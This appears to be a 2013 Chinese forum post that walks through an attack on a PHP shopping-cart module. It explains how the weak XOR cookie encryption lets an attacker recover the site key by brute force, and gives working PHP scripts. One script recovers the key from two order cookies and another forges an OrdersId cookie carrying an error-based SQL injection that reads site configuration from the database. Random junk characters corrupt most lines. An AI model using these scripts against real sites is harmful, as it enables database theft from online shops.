www.xxx.com/plus/search.php?keyword=( ^( }. [* I V% G' s2 v. \ N
在 include/shopcar.class.php中( W' }7 W z: E+ s- a
先看一下这个shopcar类是如何生成cookie的
+ q( n$ t! j. @' c+ G239 function saveCookie($key,$value)* G+ r& a0 U% L$ i
240 {
+ `& Q9 o+ o6 F1 }241 if(is_array($value))
8 P) a. A- r& ?' V: u242 { r! M: W( v0 L, p7 X6 _
243 $value = $this->enCrypt($this->enCode($value));
6 J" U) m! i. [) ~3 ~: ^244 }
! N# {& C# y) g) W8 e245 else6 H+ L6 Q7 C. y: x8 G* T" \( [
246 {
/ z# @2 Q M3 {247 $value = $this->enCrypt($value);
6 f/ F2 x7 R) m4 [& ?248 }: z+ `' U7 D7 k' E
249 setcookie($key,$value,time()+36000,’/');. k) p& Z! }6 T1 E \8 T
250 }: q: P- {+ V3 E A4 c5 ^/ T# {3 A8 ^
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
- \% L! }: O7 n4 c% O, Q) H/ Y0 J186 function enCrypt($txt). k3 e x* C3 a! @$ d
187 {0 J/ h3 d! D: V
188 srand((double)microtime() * 1000000);3 ^, K* w: g( V
189 $encrypt_key = md5(rand(0, 32000));
2 k2 q- t) S+ M4 |190 $ctr = 0;. `# k# o, P. m- Y' g* D
191 $tmp = ”;
: @7 F( o' M( |1 g2 ? O192 for($i = 0; $i < strlen($txt); $i++)
, `; V$ s1 o$ Z% X+ j# J9 a193 {
& P( F& T' L4 s- w: `+ p194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
2 j2 P' b# K$ w" ?& J' v1 _7 Z4 T% O195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);- _ n7 B+ S; L e& c
196 }6 ]- p Z: F& O t; y3 i
197 return base64_encode($this->setKey($tmp));
- V/ ^& g7 ?: ^198 }9 _- |# _1 U/ E' @/ E1 {
213 function setKey($txt), B8 G: j9 L; K" `4 S7 q6 ^
214 {& B9 R n" G k
215 global $cfg_cookie_encode;2 u( {& u U% ?% a* x1 M' |
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
) }" x# O# L. ^217 $ctr = 0;
; i; p+ V1 x; x l( P: j- H# R218 $tmp = ”;
" Z! D0 h5 F" @4 ]& a3 d219 for($i = 0; $i < strlen($txt); $i++)2 ~5 ]1 w; h% H/ @5 q
220 {
8 u8 C- r: u" }221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 E K$ @; D) _* U2 X4 o4 A
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
6 D2 H( R1 ~3 A% T7 z' W' a4 o" ^$ Q223 }
# Q% ^! r! X- Q4 `9 C0 E224 return $tmp;
! o* j* |: p( D# {; z2 o225 }! f* F% t" V* C3 i$ L8 G
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
/ o! l% q8 t7 i: z. t @( M! [" R然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
' n4 ^7 B. G: _2 P$ V8 p2 Z" g' _! k具体代码如下:
. X$ o. s4 I$ S" l<?php
2 |) n6 e7 ?0 |' O g6 M; ]0 t3 M4 g$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
0 N- V/ I8 j# Y0 r1 i% H, u$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here' D% D+ h7 U+ k) ~9 ?1 a
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
) S$ p% \$ C2 i( }3 afunction reStrCode($code,$string)9 O# j! W; k1 _5 S# H' w- I! ^( _
{
! \4 p8 J& c# k$code = base64_decode($code);* _% j. t3 Y" |% w% T2 _
$key = “”;8 b: r! S; C% s
for($i=0 ; $i<32 ; $i++)
p" }; K, A$ y/ O3 M6 G' Y{
$ n! _" C, K0 G) d7 F- b$key .= $string[$i] ^ $code[$i];2 _/ l$ }: r' U% U
}7 a2 i5 B* H* r0 i" X) e/ ~3 x
return $key;* L9 A4 M0 z6 ]: L) k2 K- {
}
( q: ?* G6 x8 m( n2 I# ]function getKeys($cookie,$plantxt)
1 u3 X0 e! v, R3 b/ G{
3 J/ e1 w- z+ D5 L# D/ K$tmp = $cookie;
& F8 k3 j6 x" ]7 m1 ~$results = array();
0 T0 \, W. r) \8 t7 f" q% E% A cfor($j=0 ; $j < 32000; $j++)8 s! z7 |6 ?6 d; M* Y+ C! o
{
, [1 g/ m" n/ c2 e: d8 K- h* E6 d4 h# j
$txt = $plantxt;$ x9 {; f" P6 p m5 R8 x
$ctr = 0;- A* N% Y3 F0 g' g5 a
$tmp = ”;
2 f0 a" |$ |0 |$encrypt_key = md5($j);& G, m" ~. q5 S
for($i =0; $i < strlen($txt); $i ++)- n( I) ?/ i7 I) C8 j/ n
{* c6 A! W) Y' d0 w) i
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; y# u. h- [, o
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
3 O' W8 a" N1 k/ ^/ ~% i}2 l1 S( N& Q6 p9 b% C
$string = $tmp;
5 @- D5 l" N& L; Q# j& Y8 X$code = $cookie;- ~8 j I, ^) _2 |- G; W
$result = reStrCode($code,$string);
! b# ` Y0 `; u. q6 R) G- yif(eregi(‘^[a-z0-9]+$’,$result))
0 N& S4 ~. i4 j1 |8 H{4 y; `) E! A. x; \) S5 `
echo $result.”\n”;! w6 h0 n1 D: S# ^2 l
$results[] = $result;2 A" q7 n$ ~0 G
}
& e% {) S1 O5 u' r' a" F; d0 g* J}
) E) ?- i9 k; dreturn $results;3 v }9 ?4 H* b! {2 q( v
}
4 x* ]& Y$ y- X7 e$results1 = getKeys($cookie1,$plantxt);. a1 v0 Y% Z2 L3 q/ [1 |
$results2 = getKeys($cookie2,$plantxt);
( Y1 S0 @3 v7 e& Zprint “\n——————–real key————————–\n”;
+ U* `, R9 p' [" Z$ g1 T9 Nforeach($results1 as $test1)
( H H. x5 J0 n{/ d: ?5 j- S9 l/ r9 M$ u v6 a- E
foreach($results2 as $test2)3 Z% E" \( B" \
{1 |$ W, Q' k- ]1 z
if($test1 == $test2)# @+ B: q. S- T, Q! o% o* r" j
{
' t) t* {+ }& y; jecho $test1.”\n”;
* {/ @; X; N2 I* n1 V}
! Y5 d' v. w/ f5 z8 k5 o/ Q}
, _" W }3 O4 F5 S N- n}# \; S: Q9 b1 D' O- F
?>
; Z1 \$ F8 D+ R$ A5 @) ]& x @cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
6 ^0 C3 Y# H7 o, Yplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1& k$ K+ r/ L5 W( a' l3 b* u3 M
然后推算出md5(strtolower($cfg_cookie_encode))
3 ]& X5 f2 H. t5 F, f$ b$ p得到这个key之后,我们就可以构造任意购物车的cookie+ Z/ v/ y* ^/ w2 \1 N
接着看4 h0 l9 d2 a; O {5 t" ]" h n8 D
20 class MemberShops, a" t, x0 T) g7 o: q
21 {5 v# { c. D* }! H+ Z
22 var $OrdersId;
- h( D6 u4 T3 C0 l3 v6 x" q23 var $productsId;
, i' ^7 Z" ~! v" l( N; ?24. I! E& L* T9 O
25 function __construct()+ @0 M: a" o# L" L$ L t
26 {
; D: e: G- ?, [4 X" N. |# W27 $this->OrdersId = $this->getCookie(“OrdersId”);
n, C- J) \2 G% n28 if(empty($this->OrdersId))
) ~& d" e4 R5 ^( B. k29 {* A2 w: j& U# [& I: {5 {
30 $this->OrdersId = $this->MakeOrders();
+ q. B7 t! U& B6 T1 O% r. K31 }! p: j. W! E6 R
32 }: f* k& O# G( @0 @ A. B7 K+ x
发现OrderId是从cookie里面获取的
2 m. J) q6 L; _3 s0 k# u. M/ G然后6 G" |; i/ k) O/ L/ x' i' X
/plus/carbuyaction.php中的4 g2 k, o0 _5 u2 i/ ~
29 $cart = new MemberShops();8 Z; @) Q2 `$ g' K
39 $OrdersId = $cart->OrdersId; //本次记录的订单号% T; m$ K! H. z _/ n; Q ^
……
9 w% D9 \: D, |5 g# n7 ~3 }173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);$ x* C( {! u/ ~) c8 H
接着我们就可以注入了& G$ @2 X# r* K, `: q9 p
通过利用下面代码生成cookie:
' {6 x2 H! @3 {0 H8 ~& K<?php
2 D0 ?" v( ]2 w$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;: v7 A' h# u7 v4 f+ g
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
" S" C5 U! _4 H& bfunction setKey($txt)0 ]0 k0 L& p, N8 ?, q* s4 R! O5 ~
{- K$ _1 o/ p. r& h8 E
global $encrypt_key;* J$ j1 C3 S1 ^/ J
$ctr = 0;( [9 P1 q8 K8 m/ N+ P! z3 s0 M$ L
$tmp = ”;
5 }9 P H% K Dfor($i = 0; $i < strlen($txt); $i++)
6 p7 ^$ h5 X* y5 X1 v) m$ _( c0 [{) O& I& m% e0 `* U( v
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
8 h g2 q, r% X$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
6 I' z' T P. ?}! R! l5 w7 q; [' W
return $tmp;
" P" k9 X" [$ C/ S$ J) i0 Z}
+ Q% h$ V& z3 Tfunction enCrypt($txt)' M9 _0 {" } h- u9 i
{0 ]; d5 t7 A, e; _/ o* Y; K% s
srand((double)microtime() * 1000000);
& a9 v5 d# R: x" R$ K# L" v$encrypt_key = md5(rand(0, 32000));( f" i2 y& H4 l- w; T# {9 F
$ctr = 0;. g. Y9 y2 Y- y& u
$tmp = ”;
9 }! y/ X, {1 A0 F4 [+ v1 Cfor($i = 0; $i < strlen($txt); $i++)
. ]$ J! B/ V% G7 B4 k{
3 s0 E! y, X5 ]- Z$ R$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' L7 e" S( s1 c$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);6 M2 U3 w8 T9 U7 F2 ?
}: X h' A$ l9 L. C3 B
return base64_encode(setKey($tmp));
7 `" q+ }! X/ w4 U}4 S5 ]# U6 F2 P6 o! T" }
for($dest =0;$dest = enCrypt($txt);)
; T& T: P- W8 R3 U5 ]{3 W" N7 T, @5 o9 b4 { }2 z
if(!strpos($dest,’+')); P0 \2 |0 p4 Q; \% O
{
8 g; F4 i, h. n9 Z4 n# S" Q' U/ q. }break;
1 {" }+ g9 g) v, i! ]}
1 \' m/ @' z1 Q) ~' M- H( l7 z}
2 @) z. m5 D4 E- h: uecho $dest.”\n”;
0 M& A& t; R3 Z8 y; ~$ n?>9 y) @5 S9 R Z. k J6 {' W& L1 b
/ ] g: o. Q1 A7 b6 I. Z
|
发表于 2013-2-13 23:58:29
收藏
支持
反对